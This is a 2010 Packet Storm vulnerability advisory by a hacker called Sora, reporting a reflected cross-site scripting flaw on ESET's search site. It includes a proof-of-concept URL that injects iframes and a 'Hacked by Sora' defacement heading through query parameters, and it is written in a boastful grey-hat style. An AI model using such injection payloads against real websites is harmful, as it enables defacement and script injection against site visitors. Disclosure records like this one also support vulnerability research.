ESET Cross Site Scripting

2010-01-05T00:00:00
ID PACKETSTORM:84773
Type packetstorm
Reporter Sora
Modified 2010-01-05T00:00:00

Description

                                        
                                            `___________ _______________________________  
\_ _____// _____/\_ _____/\__ ___/  
| __)_ \_____ \ | __)_ | |  
| \/ \ | \ | | http://www.eset.com/  
|  
/_______ /_______ //_______ / |____|  
\/ \/ \/ > Cross Site Scripting Exploit  
> Author: Sora  
> Contact: vhr95zw [at] hotmail [dot] com  
> Website: http://greyhathackers.wordpress.com/  
> Vulnerability: Cross Site Scripting  
  
————————-  
1. INFORMATION |  
————————-  
Site: http://search.eset.com/  
Vulnerability: Cross Site Scripting  
Vulnerability Level: 3  
  
————————-  
2. DESCRIPTION |  
————————-  
  
http;//search.eset.com/ suffers a remote cross site scripting exploit, which can be used to  
scam information and to execute malicious javascript which might remotely download a file to the  
victim’s PC.  
  
————————-  
3. PROOF OF CONCEPT |  
————————-  
  
http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox[]=en-US  
  
Pretty much owned? >:D  
  
————————-  
4. GREETZ |  
————————-  
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #  
  
————————-  
5. CONTACT |  
————————-  
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com  
  
<c> 2010 – http://greyhathackers.wordpress.com – Sora  
  
  
`